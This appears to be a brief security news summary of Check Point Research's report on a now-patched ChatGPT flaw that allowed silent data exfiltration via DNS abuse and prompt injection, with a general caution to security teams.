Check Point Research (CPR) has uncovered a significant vulnerability in ChatGPT, allowing for silent data exfiltration through DNS abuse and prompt injection techniques. This flaw permitted attackers to bypass standard security measures, potentially stealing sensitive user information, such as medical data and personal contracts, without alerting users. CPR highlighted that DNS, often viewed as benign, can be exploited to covertly transmit data, creating a blind spot in security assumptions about AI tools. OpenAI addressed this vulnerability with a patch on February 20, 2026, marking it as a crucial corrective measure alongside fixing another significant issue that exposed GitHub authentication tokens. The incident serves as a caution to security teams, emphasizing that AI systems require ongoing scrutiny, as attackers can exploit underlying infrastructure and user behavior. This essential update reinforces the need for secure data handling practices, particularly in AI applications, to safeguard sensitive information from emerging threats.
Source link
